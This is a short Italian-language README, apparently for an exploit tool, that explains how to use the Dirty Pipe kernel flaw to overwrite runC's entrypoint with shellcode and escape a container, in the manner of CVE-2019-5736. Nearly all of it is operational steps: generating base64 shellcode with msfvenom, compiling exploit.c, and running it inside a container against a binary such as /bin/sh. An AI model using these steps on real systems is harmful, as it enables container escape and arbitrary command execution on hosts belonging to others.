
Un semplice exploit che utilizza dirtypipe per iniettare shellcode nell'entrypoint di runC per implementare evasioni dai container.
Un semplice exploit che usa dirtypipe per iniettare shellcode nell'entrypoint di runC e implementare evasioni dai container.
Genera la shellcode codificata in base64 usando msf:
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64
Compila ed esegui nel container; il nome del file sovrascritto è il binario che runC eseguirà nel container (ad esempio /bin/sh):
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>
Attiva l'exploit e la shellcode all'esterno del container come in CVE-2019-5736.